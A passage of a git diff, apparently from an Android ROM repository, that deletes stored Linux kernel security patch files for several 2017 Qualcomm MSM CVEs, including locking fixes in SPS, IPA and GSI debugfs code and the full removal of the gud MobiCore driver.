- ret = copy_to_user((void __user *)arg, -- &rndis->max_pkt_size, -- sizeof(rndis->max_pkt_size)); -+ &qc_max_pkt_size, -+ sizeof(qc_max_pkt_size)); - if (ret) { - pr_err("copying to user space failed"); - ret = -EFAULT; - } - pr_debug("Sent max packet size %d", -- rndis->max_pkt_size); -+ qc_max_pkt_size); - break; - default: - pr_err("Unsupported IOCTL"); - ret = -EINVAL; - } - -- rndis_qc_unlock(&rndis->ioctl_excl); -+ spin_lock_irqsave(&rndis_lock, flags); -+ -+ if (!_rndis_qc) { -+ pr_err("rndis_qc_dev not present\n"); -+ ret = -ENODEV; -+ goto fail; -+ } -+ rndis_qc_unlock(&_rndis_qc->ioctl_excl); - -+fail: -+ spin_unlock_irqrestore(&rndis_lock, flags); - return ret; - } - -@@ -1323,6 +1368,8 @@ static int rndis_qc_init(void) - - pr_info("initialize rndis QC instance\n"); - -+ spin_lock_init(&rndis_lock); -+ - ret = misc_register(&rndis_qc_device); - if (ret) - pr_err("rndis QC driver failed to register"); diff --git a/Patches/Linux_CVEs/CVE-2017-9686/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9686/ANY/0001.patch deleted file mode 100644 index 1b784b0b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9686/ANY/0001.patch +++ /dev/null 
@@ -1,193 +0,0 @@ -From de875dd095d3ec0906c77518d28f793e6c69a9da Mon Sep 17 00:00:00 2001 -From: Siva Kumar Akkireddi -Date: Thu, 11 May 2017 15:29:47 +0530 -Subject: msm: sps: Fix race condition in SPS debugfs APIs - -SPS debugfs APIs can be called concurrently which can result -in dangling pointer access. This change synchronizes access -to the SPS debugfs buffer. - -Change-Id: I409b3f0618f760cb67eba47b43c81d166cdae4aa -Signed-off-by: Siva Kumar Akkireddi ---- - drivers/platform/msm/sps/sps.c | 15 ++++++++++++++- - drivers/platform/msm/sps/spsi.h | 17 ----------------- - 2 files changed, 14 insertions(+), 18 deletions(-) - -diff --git a/drivers/platform/msm/sps/sps.c b/drivers/platform/msm/sps/sps.c -index b812960..e2abeaf 100644 ---- a/drivers/platform/msm/sps/sps.c -+++ b/drivers/platform/msm/sps/sps.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2011-2016 , The Linux Foundation. All rights reserved. -+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -67,6 +67,7 @@ static char *debugfs_buf; - static u32 debugfs_buf_size; - static u32 debugfs_buf_used; - static int wraparound; -+static struct mutex sps_debugfs_lock; - - struct dentry *dent; - struct dentry *dfile_info; -@@ -85,6 +86,7 @@ static struct sps_bam *phy2bam(phys_addr_t phys_addr); - /* record debug info for debugfs */ - void sps_debugfs_record(const char *msg) - { -+ mutex_lock(&sps_debugfs_lock); - if (debugfs_record_enabled) { - if (debugfs_buf_used + MAX_MSG_LEN >= debugfs_buf_size) { - debugfs_buf_used = 0; -@@ -98,6 +100,7 @@ void sps_debugfs_record(const char *msg) - debugfs_buf_size - debugfs_buf_used, - "\n**** end line of sps log ****\n\n"); - } -+ mutex_unlock(&sps_debugfs_lock); - } - - /* read the recorded debug info to userspace */ -@@ -107,6 +110,7 @@ static ssize_t sps_read_info(struct file *file, char __user *ubuf, - int 
ret = 0; - int size; - -+ mutex_lock(&sps_debugfs_lock); - if (debugfs_record_enabled) { - if (wraparound) - size = debugfs_buf_size - MAX_MSG_LEN; -@@ -116,6 +120,7 @@ static ssize_t sps_read_info(struct file *file, char __user *ubuf, - ret = simple_read_from_buffer(ubuf, count, ppos, - debugfs_buf, size); - } -+ mutex_unlock(&sps_debugfs_lock); - - return ret; - } -@@ -161,11 +166,13 @@ static ssize_t sps_set_info(struct file *file, const char __user *buf, - - new_buf_size = buf_size_kb * SZ_1K; - -+ mutex_lock(&sps_debugfs_lock); - if (debugfs_record_enabled) { - if (debugfs_buf_size == new_buf_size) { - /* need do nothing */ - pr_info("sps:debugfs: input buffer size " - "is the same as before.\n"); -+ mutex_unlock(&sps_debugfs_lock); - return count; - } else { - /* release the current buffer */ -@@ -185,12 +192,14 @@ static ssize_t sps_set_info(struct file *file, const char __user *buf, - if (!debugfs_buf) { - debugfs_buf_size = 0; - pr_err("sps:fail to allocate memory for debug_fs.\n"); -+ mutex_unlock(&sps_debugfs_lock); - return -ENOMEM; - } - - debugfs_buf_used = 0; - wraparound = false; - debugfs_record_enabled = true; -+ mutex_unlock(&sps_debugfs_lock); - - return count; - } -@@ -239,6 +248,7 @@ static ssize_t sps_set_logging_option(struct file *file, const char __user *buf, - return count; - } - -+ mutex_lock(&sps_debugfs_lock); - if (((option == 0) || (option == 2)) && - ((logging_option == 1) || (logging_option == 3))) { - debugfs_record_enabled = false; -@@ -250,6 +260,7 @@ static ssize_t sps_set_logging_option(struct file *file, const char __user *buf, - } - - logging_option = option; -+ mutex_unlock(&sps_debugfs_lock); - - return count; - } -@@ -587,6 +598,8 @@ static void sps_debugfs_init(void) - goto bam_log_level_err; - } - -+ mutex_init(&sps_debugfs_lock); -+ - return; - - bam_log_level_err: -diff --git a/drivers/platform/msm/sps/spsi.h b/drivers/platform/msm/sps/spsi.h -index ccf761e..abf4b04 100644 ---- a/drivers/platform/msm/sps/spsi.h -+++ 
b/drivers/platform/msm/sps/spsi.h -@@ -145,11 +145,6 @@ extern u8 print_limit_option; - pr_info(msg, ##args); \ - } \ - } while (0) --#define SPS_DEBUGFS(msg, args...) do { \ -- char buf[MAX_MSG_LEN]; \ -- snprintf(buf, MAX_MSG_LEN, msg"\n", ##args); \ -- sps_debugfs_record(buf); \ -- } while (0) - #define SPS_ERR(dev, msg, args...) do { \ - if (logging_option != 1) { \ - if (unlikely(print_limit_option > 2)) \ -@@ -157,8 +152,6 @@ extern u8 print_limit_option; - else \ - pr_err(msg, ##args); \ - } \ -- if (unlikely(debugfs_record_enabled)) \ -- SPS_DEBUGFS(msg, ##args); \ - SPS_IPC(3, dev, msg, args); \ - } while (0) - #define SPS_INFO(dev, msg, args...) do { \ -@@ -168,8 +161,6 @@ extern u8 print_limit_option; - else \ - pr_info(msg, ##args); \ - } \ -- if (unlikely(debugfs_record_enabled)) \ -- SPS_DEBUGFS(msg, ##args); \ - SPS_IPC(3, dev, msg, args); \ - } while (0) - #define SPS_DBG(dev, msg, args...) do { \ -@@ -181,8 +172,6 @@ extern u8 print_limit_option; - pr_info(msg, ##args); \ - } else \ - pr_debug(msg, ##args); \ -- if (unlikely(debugfs_record_enabled)) \ -- SPS_DEBUGFS(msg, ##args); \ - if (dev) { \ - if ((dev)->ipc_loglevel <= 0) \ - SPS_IPC(0, dev, msg, args); \ -@@ -197,8 +186,6 @@ extern u8 print_limit_option; - pr_info(msg, ##args); \ - } else \ - pr_debug(msg, ##args); \ -- if (unlikely(debugfs_record_enabled)) \ -- SPS_DEBUGFS(msg, ##args); \ - if (dev) { \ - if ((dev)->ipc_loglevel <= 1) \ - SPS_IPC(1, dev, msg, args); \ -@@ -213,8 +200,6 @@ extern u8 print_limit_option; - pr_info(msg, ##args); \ - } else \ - pr_debug(msg, ##args); \ -- if (unlikely(debugfs_record_enabled)) \ -- SPS_DEBUGFS(msg, ##args); \ - if (dev) { \ - if ((dev)->ipc_loglevel <= 2) \ - SPS_IPC(2, dev, msg, args); \ -@@ -229,8 +214,6 @@ extern u8 print_limit_option; - pr_info(msg, ##args); \ - } else \ - pr_debug(msg, ##args); \ -- if (unlikely(debugfs_record_enabled)) \ -- SPS_DEBUGFS(msg, ##args); \ - if (dev) { \ - if ((dev)->ipc_loglevel <= 3) \ - SPS_IPC(3, dev, msg, 
args); \ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-9687/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9687/3.18/0001.patch deleted file mode 100644 index 8ad40b53..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9687/3.18/0001.patch +++ /dev/null 
@@ -1,58 +0,0 @@
-From 34cff2eb2adc663de32ca682b57551c50c9253c6 Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Fri, 21 Apr 2017 10:42:57 -0700
-Subject: [PATCH] msm: ipa: fix IPC low priority logging
-
-Allocate IPC low priority on first usage only.
-
-Bug: 62827190
-Change-Id: Icea7f0fad9ed34c93641296f68736bbaf2e6eaa9
-CRs-Fixed: 2016076
-Acked-by: Ady Abraham
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c b/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c
-index 12127a2304bbc..66482e2dc0634 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c
-@@ -105,6 +105,7 @@ static char dbg_buff[IPA_MAX_MSG_LEN];
- static char *active_clients_buf;
-
- static s8 ep_reg_idx;
-+static void *ipa_ipc_low_buff;
-
-
- static ssize_t ipa3_read_gen_reg(struct file *file, char __user *ubuf,
-@@ -1610,22 +1611,20 @@ static ssize_t ipa3_enable_ipc_low(struct file *file,
- if (kstrtos8(dbg_buff, 0, &option))
- return -EFAULT;
-
-+ mutex_lock(&ipa3_ctx->lock);
- if (option) {
-- if (!ipa3_ctx->logbuf_low) {
-- ipa3_ctx->logbuf_low =
-+ if (!ipa_ipc_low_buff) {
-+ ipa_ipc_low_buff =
- ipc_log_context_create(IPA_IPC_LOG_PAGES,
- "ipa_low", 0);
- }
--
-- if (ipa3_ctx->logbuf_low == NULL) {
-- IPAERR("failed to get logbuf_low\n");
-- return -EFAULT;
-- }
-+ if (ipa_ipc_low_buff == NULL)
-+ IPAERR("failed to get logbuf_low\n");
-+ ipa3_ctx->logbuf_low = ipa_ipc_low_buff;
- } else {
-- if (ipa3_ctx->logbuf_low)
-- ipc_log_context_destroy(ipa3_ctx->logbuf_low);
- ipa3_ctx->logbuf_low = NULL;
- }
-+ mutex_unlock(&ipa3_ctx->lock);
-
- return count;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-9687/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9687/4.4/0002.patch
deleted file mode 100644
index 71235954..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9687/4.4/0002.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 8f1a77f5da53edd2b5a1c42ddd766712a90109d6 Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Thu, 20 Apr 2017 10:25:43 -0700
-Subject: msm: gsi: fix IPC low priority logging
-
-Allocate IPC low priority on first usage only.
-
-Change-Id: Ic44f5af02d1d7fd72b255c8989cfc6b7dcd7766d
-CRs-Fixed: 2016076
-Acked-by: Ady Abraham
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/gsi/gsi_dbg.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/platform/msm/gsi/gsi_dbg.c b/drivers/platform/msm/gsi/gsi_dbg.c
-index 717c8917..eaf50ca 100644
---- a/drivers/platform/msm/gsi/gsi_dbg.c
-+++ b/drivers/platform/msm/gsi/gsi_dbg.c
-@@ -29,6 +29,7 @@
-
- static struct dentry *dent;
- static char dbg_buff[4096];
-+static void *gsi_ipc_logbuf_low;
-
- static void gsi_wq_print_dp_stats(struct work_struct *work);
- static DECLARE_DELAYED_WORK(gsi_print_dp_stats_work, gsi_wq_print_dp_stats);
-@@ -764,22 +765,20 @@ static ssize_t gsi_enable_ipc_low(struct file *file,
- if (kstrtos8(dbg_buff, 0, &option))
- return -EFAULT;
-
-+ mutex_lock(&gsi_ctx->mlock);
- if (option) {
-- if (!gsi_ctx->ipc_logbuf_low) {
-- gsi_ctx->ipc_logbuf_low =
-+ if (!gsi_ipc_logbuf_low) {
-+ gsi_ipc_logbuf_low =
- ipc_log_context_create(GSI_IPC_LOG_PAGES,
- "gsi_low", 0);
-+ if (gsi_ipc_logbuf_low == NULL)
-+ TERR("failed to get ipc_logbuf_low\n");
- }
--
-- if (gsi_ctx->ipc_logbuf_low == NULL) {
-- TERR("failed to get ipc_logbuf_low\n");
-- return -EFAULT;
-- }
-+ gsi_ctx->ipc_logbuf_low = gsi_ipc_logbuf_low;
- } else {
-- if (gsi_ctx->ipc_logbuf_low)
-- ipc_log_context_destroy(gsi_ctx->ipc_logbuf_low);
- gsi_ctx->ipc_logbuf_low = NULL;
- }
-+ mutex_unlock(&gsi_ctx->mlock);
-
- return count;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9690/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9690/3.18/0001.patch
deleted file mode 100644
index 15d4323f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9690/3.18/0001.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From b59b67fbd2f1d4f71e7a4f9e6723f04b717efc74 Mon Sep 17 00:00:00 2001
-From: Siarhei Vishniakou
-Date: Thu, 16 Mar 2017 16:26:53 -0700
-Subject: [PATCH] arm64: dts: marlin: remove QBT1000 from device tree
-
-Marlin does not use QBT1000.
-
-Bug: 36575870
-Bug: 36227548
-Test: Tested on marlin and sailfish.
-
-Change-Id: I48a2b75f1cd678a673a8706e8d3304b25f45d3cd
-Signed-off-by: Siarhei Vishniakou
----
- arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi b/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi
-index 831a99c32c0aa..4fedb4b6149c4 100644
---- a/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi
-+++ b/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi
-@@ -109,6 +109,7 @@
- qcom,mitigation-freq-khz = <1132800>;
- };
- };
-+ /delete-node/ qcom,qbt1000;
- };
-
- &wdog {
diff --git a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9691/ANY/0001.patch
deleted file mode 100644
index 90eb2966..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 869bd2cd3d6c17826b6f162e0d721174224b867a Mon Sep 17 00:00:00 2001
-From: Dennis Cagle
-Date: Wed, 31 May 2017 15:11:05 -0700
-Subject: [PATCH] defconfig: gud: Remove gud driver
-
-Disable and remove gud mobicore driver.
-
-Bug: 33842910
-CRs-Fixed: 1116560
-Change-Id: Ia16bc3e1331f86724a391fd367587b56ccc14546
-Acked-by: Tony Hamilton
-Signed-off-by: Trudy Shearer
-Signed-off-by: Dennis Cagle
----
- arch/arm64/configs/msm-auto_defconfig | 1 -
- arch/arm64/configs/msm_defconfig | 1 -
- 2 files changed, 2 deletions(-)
-
-diff --git a/arch/arm64/configs/msm-auto_defconfig b/arch/arm64/configs/msm-auto_defconfig
-index 9a1856e70ceeb..2839526226bac 100644
---- a/arch/arm64/configs/msm-auto_defconfig
-+++ b/arch/arm64/configs/msm-auto_defconfig
-@@ -596,7 +596,6 @@ CONFIG_CORESIGHT_REMOTE_ETM=y
- CONFIG_CORESIGHT_QPDI=y
- CONFIG_SENSORS_SSC=y
- CONFIG_MSM_TZ_LOG=y
--CONFIG_MOBICORE_DRIVER=m
- CONFIG_EXT2_FS=y
- CONFIG_EXT2_FS_XATTR=y
- CONFIG_EXT3_FS=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index ba053b5abfdfc..1fbbbbe876ad4 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -594,7 +594,6 @@ CONFIG_CORESIGHT_REMOTE_ETM=y
- CONFIG_CORESIGHT_QPDI=y
- CONFIG_SENSORS_SSC=y
- CONFIG_MSM_TZ_LOG=y
--CONFIG_MOBICORE_DRIVER=m
- CONFIG_EXT2_FS=y
- CONFIG_EXT2_FS_XATTR=y
- CONFIG_EXT3_FS=y
diff --git a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-9691/ANY/0002.patch
deleted file mode 100644
index 345a38c8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0002.patch
+++ /dev/null
@@ -1,9751 +0,0 @@ -From 04468bc1d72f15e6b8f19014e8c6203038dd6b23 Mon Sep 17 00:00:00 2001 -From: Maggie White -Date: Fri, 2 Jun 2017 18:10:06 -0700 -Subject: [PATCH] msm: gud: Remove gud driver - -Complete removal of gud mobicore driver. -The driver author delivers an updated version of the driver to -interested parties directly rendering this version obsolete. - -Bug: 33842910 -CRs-Fixed: 1116560 -Change-Id: I40498d3203b1d6ca04f2b5a2e65461851d84d2d4 -Acked-by: Tony Hamilton -Signed-off-by: Trudy Shearer -Signed-off-by: Dennis Cagle -Signed-off-by: Maggie White ---- - drivers/Kconfig | 2 - - drivers/Makefile | 3 - - drivers/gud/Kconfig | 35 - - drivers/gud/Makefile | 6 - - drivers/gud/MobiCoreDriver/Makefile | 33 - - drivers/gud/MobiCoreDriver/admin.c | 1011 ------------------- - drivers/gud/MobiCoreDriver/admin.h | 32 - - drivers/gud/MobiCoreDriver/api.c | 419 -------- - drivers/gud/MobiCoreDriver/api.h | 46 - - drivers/gud/MobiCoreDriver/arm.h | 88 -- - drivers/gud/MobiCoreDriver/build_tag.h | 15 - - drivers/gud/MobiCoreDriver/client.c | 572 ----------- - drivers/gud/MobiCoreDriver/client.h | 99 -- - drivers/gud/MobiCoreDriver/clientlib.c | 433 -------- - drivers/gud/MobiCoreDriver/clock.c | 161 --- - drivers/gud/MobiCoreDriver/clock.h | 53 - - drivers/gud/MobiCoreDriver/debug.h | 63 -- - drivers/gud/MobiCoreDriver/fastcall.c | 512 ---------- - drivers/gud/MobiCoreDriver/fastcall.h | 38 - - drivers/gud/MobiCoreDriver/logging.c | 251 ----- - drivers/gud/MobiCoreDriver/logging.h | 51 - - drivers/gud/MobiCoreDriver/main.c | 750 -------------- - drivers/gud/MobiCoreDriver/main.h | 60 -- - drivers/gud/MobiCoreDriver/mci/mcifc.h | 144 --- - drivers/gud/MobiCoreDriver/mci/mcimcp.h | 508 ---------- - drivers/gud/MobiCoreDriver/mci/mcinq.h | 86 -- - drivers/gud/MobiCoreDriver/mci/mcloadformat.h | 134 --- - drivers/gud/MobiCoreDriver/mcp.c | 1067 -------------------- - drivers/gud/MobiCoreDriver/mcp.h | 121 --- - drivers/gud/MobiCoreDriver/mmu.c | 450 --------- - 
drivers/gud/MobiCoreDriver/mmu.h | 44 - - drivers/gud/MobiCoreDriver/platform.h | 150 --- - drivers/gud/MobiCoreDriver/pm.c | 62 -- - drivers/gud/MobiCoreDriver/pm.h | 36 - - drivers/gud/MobiCoreDriver/public/mc_admin.h | 80 -- - drivers/gud/MobiCoreDriver/public/mc_linux.h | 170 ---- - drivers/gud/MobiCoreDriver/public/mc_linux_api.h | 28 - - .../MobiCoreDriver/public/mobicore_driver_api.h | 450 --------- - drivers/gud/MobiCoreDriver/scheduler.c | 231 ----- - drivers/gud/MobiCoreDriver/scheduler.h | 25 - - drivers/gud/MobiCoreDriver/session.c | 779 -------------- - drivers/gud/MobiCoreDriver/session.h | 63 -- - drivers/gud/setupDrivers.sh | 19 - - 43 files changed, 9380 deletions(-) - delete mode 100644 drivers/gud/Kconfig - delete mode 100644 drivers/gud/Makefile - delete mode 100644 drivers/gud/MobiCoreDriver/Makefile - delete mode 100644 drivers/gud/MobiCoreDriver/admin.c - delete mode 100644 drivers/gud/MobiCoreDriver/admin.h - delete mode 100644 drivers/gud/MobiCoreDriver/api.c - delete mode 100644 drivers/gud/MobiCoreDriver/api.h - delete mode 100644 drivers/gud/MobiCoreDriver/arm.h - delete mode 100644 drivers/gud/MobiCoreDriver/build_tag.h - delete mode 100644 drivers/gud/MobiCoreDriver/client.c - delete mode 100644 drivers/gud/MobiCoreDriver/client.h - delete mode 100644 drivers/gud/MobiCoreDriver/clientlib.c - delete mode 100644 drivers/gud/MobiCoreDriver/clock.c - delete mode 100644 drivers/gud/MobiCoreDriver/clock.h - delete mode 100644 drivers/gud/MobiCoreDriver/debug.h - delete mode 100644 drivers/gud/MobiCoreDriver/fastcall.c - delete mode 100644 drivers/gud/MobiCoreDriver/fastcall.h - delete mode 100644 drivers/gud/MobiCoreDriver/logging.c - delete mode 100644 drivers/gud/MobiCoreDriver/logging.h - delete mode 100644 drivers/gud/MobiCoreDriver/main.c - delete mode 100644 drivers/gud/MobiCoreDriver/main.h - delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcifc.h - delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcimcp.h - delete mode 100644 
drivers/gud/MobiCoreDriver/mci/mcinq.h - delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcloadformat.h - delete mode 100644 drivers/gud/MobiCoreDriver/mcp.c - delete mode 100644 drivers/gud/MobiCoreDriver/mcp.h - delete mode 100644 drivers/gud/MobiCoreDriver/mmu.c - delete mode 100644 drivers/gud/MobiCoreDriver/mmu.h - delete mode 100644 drivers/gud/MobiCoreDriver/platform.h - delete mode 100644 drivers/gud/MobiCoreDriver/pm.c - delete mode 100644 drivers/gud/MobiCoreDriver/pm.h - delete mode 100644 drivers/gud/MobiCoreDriver/public/mc_admin.h - delete mode 100644 drivers/gud/MobiCoreDriver/public/mc_linux.h - delete mode 100644 drivers/gud/MobiCoreDriver/public/mc_linux_api.h - delete mode 100644 drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h - delete mode 100644 drivers/gud/MobiCoreDriver/scheduler.c - delete mode 100644 drivers/gud/MobiCoreDriver/scheduler.h - delete mode 100644 drivers/gud/MobiCoreDriver/session.c - delete mode 100644 drivers/gud/MobiCoreDriver/session.h - delete mode 100644 drivers/gud/setupDrivers.sh - -diff --git a/drivers/Kconfig b/drivers/Kconfig -index 0e7c68c62542a..8b796ec00009e 100644 ---- a/drivers/Kconfig -+++ b/drivers/Kconfig -@@ -200,8 +200,6 @@ source "drivers/firmware/Kconfig" - - source "drivers/bif/Kconfig" - --source "drivers/gud/Kconfig" -- - source "drivers/htc_mnemosyne/Kconfig" - - endmenu -diff --git a/drivers/Makefile b/drivers/Makefile -index fb0cd18143ad5..13236262a1857 100644 ---- a/drivers/Makefile -+++ b/drivers/Makefile -@@ -171,9 +171,6 @@ obj-$(CONFIG_BIF) += bif/ - - obj-$(CONFIG_SENSORS_SSC) += sensors/ - --# --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#include "public/mc_linux.h" --#include "public/mc_admin.h" -- --#include "mci/mcloadformat.h" -- --#include "main.h" --#include "debug.h" --#include "mmu.h" /* For load_check and load_token */ --#include "mcp.h" --#include "client.h" --#include 
"api.h" --#include "admin.h" -- --/* We need 2 devices for admin and user interface*/ --#define MC_DEV_MAX 2 -- --static struct admin_ctx { -- struct device *dev; -- atomic_t daemon_counter; -- /* Define a MobiCore device structure for use with dev_debug() etc */ -- struct device_driver mc_dev_name; -- dev_t mc_dev_admin; -- struct cdev mc_admin_cdev; -- int (*tee_start_cb)(void); --} g_admin_ctx; -- --static struct mc_admin_driver_request { -- /* Global */ -- struct mutex mutex; /* Protects access to this struct */ -- struct mutex states_mutex; /* Protect access to the states */ -- enum client_state { -- IDLE, -- REQUEST_SENT, -- BUFFERS_READY, -- } client_state; -- enum server_state { -- NOT_CONNECTED, /* Device not open */ -- READY, /* Waiting for requests */ -- REQUEST_RECEIVED, /* Got a request, is working */ -- RESPONSE_SENT, /* Has sent a response header */ -- DATA_SENT, /* Blocked until data is consumed */ -- } server_state; -- /* Request */ -- uint32_t request_id; -- struct mc_admin_request request; -- struct completion client_complete; -- /* Response */ -- struct mc_admin_response response; -- struct completion server_complete; -- void *buffer; /* Reception buffer (pre-allocated) */ -- size_t size; /* Size of the reception buffer */ --} g_request; -- --static struct tbase_object *tbase_object_alloc(bool is_sp_trustlet, -- size_t length) --{ -- struct tbase_object *obj; -- size_t size = sizeof(*obj) + length; -- size_t header_length = 0; -- -- /* Determine required size */ -- if (is_sp_trustlet) { -- /* Need space for lengths info and containers */ -- header_length = sizeof(struct mc_blob_len_info); -- size += header_length + 3 * MAX_SO_CONT_SIZE; -- } -- -- /* Allocate memory */ -- obj = vzalloc(size); -- if (!obj) -- return NULL; -- -- /* A non-zero header_length indicates that we have a SP trustlet */ -- obj->header_length = header_length; -- obj->length = length; -- return obj; --} -- --void tbase_object_free(struct tbase_object *robj) --{ -- 
vfree(robj); --} -- --static inline void client_state_change(enum client_state state) --{ -- mutex_lock(&g_request.states_mutex); -- g_request.client_state = state; -- mutex_unlock(&g_request.states_mutex); --} -- --static inline bool client_state_is(enum client_state state) --{ -- bool is; -- -- mutex_lock(&g_request.states_mutex); -- is = g_request.client_state == state; -- mutex_unlock(&g_request.states_mutex); -- return is; --} -- --static inline void server_state_change(enum server_state state) --{ -- mutex_lock(&g_request.states_mutex); -- g_request.server_state = state; -- mutex_unlock(&g_request.states_mutex); --} -- --static inline bool server_state_is(enum server_state state) --{ -- bool is; -- -- mutex_lock(&g_request.states_mutex); -- is = g_request.server_state == state; -- mutex_unlock(&g_request.states_mutex); -- return is; --} -- --static void request_cancel(void); -- --static int request_send(uint32_t command, const struct mc_uuid_t *uuid, -- uint32_t is_gp, uint32_t spid) --{ -- struct device *dev = g_admin_ctx.dev; -- int counter = 10; -- int ret; -- -- /* Prepare request */ -- mutex_lock(&g_request.states_mutex); -- /* Wait a little for daemon to connect */ -- while ((g_request.server_state == NOT_CONNECTED) && counter--) { -- mutex_unlock(&g_request.states_mutex); -- ssleep(1); -- mutex_lock(&g_request.states_mutex); -- } -- -- BUG_ON(g_request.client_state != IDLE); -- if (g_request.server_state != READY) { -- mutex_unlock(&g_request.states_mutex); -- if (g_request.server_state != NOT_CONNECTED) { -- /* TODO: can we recover? 
*/ -- dev_err(dev, "%s: invalid daemon state %d\n", __func__, -- g_request.server_state); -- ret = -EPROTO; -- goto end; -- } else { -- dev_err(dev, "%s: daemon not connected\n", __func__); -- ret = -ENOTCONN; -- goto end; -- } -- } -- -- memset(&g_request.request, 0, sizeof(g_request.request)); -- memset(&g_request.response, 0, sizeof(g_request.response)); -- g_request.request.request_id = g_request.request_id++; -- g_request.request.command = command; -- if (uuid) -- memcpy(&g_request.request.uuid, uuid, sizeof(*uuid)); -- else -- memset(&g_request.request.uuid, 0, sizeof(*uuid)); -- -- g_request.request.is_gp = is_gp; -- g_request.request.spid = spid; -- g_request.client_state = REQUEST_SENT; -- mutex_unlock(&g_request.states_mutex); -- -- /* Send request */ -- complete(&g_request.client_complete); -- -- /* Wait for header (could be interruptible, but then needs more work) */ -- wait_for_completion(&g_request.server_complete); -- -- /* Server should be waiting with some data for us */ -- mutex_lock(&g_request.states_mutex); -- switch (g_request.server_state) { -- case NOT_CONNECTED: -- /* Daemon gone */ -- ret = -EPIPE; -- break; -- case READY: -- /* No data to come, likely an error */ -- ret = -g_request.response.error_no; -- break; -- case RESPONSE_SENT: -- case DATA_SENT: -- /* Normal case, data to come */ -- ret = 0; -- break; -- default: -- /* Should not happen as complete means the state changed */ -- dev_err(dev, "%s: daemon is in a bad state: %d\n", __func__, -- g_request.server_state); -- ret = -EPIPE; -- break; -- } -- -- mutex_unlock(&g_request.states_mutex); -- --end: -- if (ret) -- request_cancel(); -- -- return ret; --} -- --static int request_receive(void *address, uint32_t size) --{ -- /* -- * At this point we have received the header and prepared some buffers -- * to receive data that we know are coming from the server. 
-- */ -- -- /* Check server state */ -- bool server_ok; -- -- mutex_lock(&g_request.states_mutex); -- server_ok = (g_request.server_state == RESPONSE_SENT) || -- (g_request.server_state == DATA_SENT); -- mutex_unlock(&g_request.states_mutex); -- if (!server_ok) { -- /* TODO: can we recover? */ -- request_cancel(); -- return -EPIPE; -- } -- -- /* Setup reception buffer */ -- g_request.buffer = address; -- g_request.size = size; -- client_state_change(BUFFERS_READY); -- -- /* Unlock write of data */ -- complete(&g_request.client_complete); -- -- /* Wait for data (far too late to be interruptible) */ -- wait_for_completion(&g_request.server_complete); -- -- /* Reset reception buffer */ -- g_request.buffer = NULL; -- g_request.size = 0; -- -- /* Return to idle state */ -- client_state_change(IDLE); -- return 0; --} -- --/* Must be called instead of request_receive() to cancel a pending request */ --static void request_cancel(void) --{ -- /* Unlock write of data */ -- mutex_lock(&g_request.states_mutex); -- if (g_request.server_state == DATA_SENT) -- complete(&g_request.client_complete); -- -- /* Return to idle state */ -- g_request.client_state = IDLE; -- mutex_unlock(&g_request.states_mutex); --} -- --static int admin_get_root_container(void *address) --{ -- struct device *dev = g_admin_ctx.dev; -- int ret = 0; -- -- /* Lock communication channel */ -- mutex_lock(&g_request.mutex); -- -- /* Send request and wait for header */ -- ret = request_send(MC_DRV_GET_ROOT_CONTAINER, 0, 0, 0); -- if (ret) -- goto end; -- -- /* Check length against max */ -- if (g_request.response.length >= MAX_SO_CONT_SIZE) { -- request_cancel(); -- dev_err(dev, "%s: response length exceeds maximum\n", __func__); -- ret = EREMOTEIO; -- goto end; -- } -- -- /* Get data */ -- ret = request_receive(address, g_request.response.length); -- if (!ret) -- ret = g_request.response.length; -- --end: -- mutex_unlock(&g_request.mutex); -- return ret; --} -- --static int admin_get_sp_container(void 
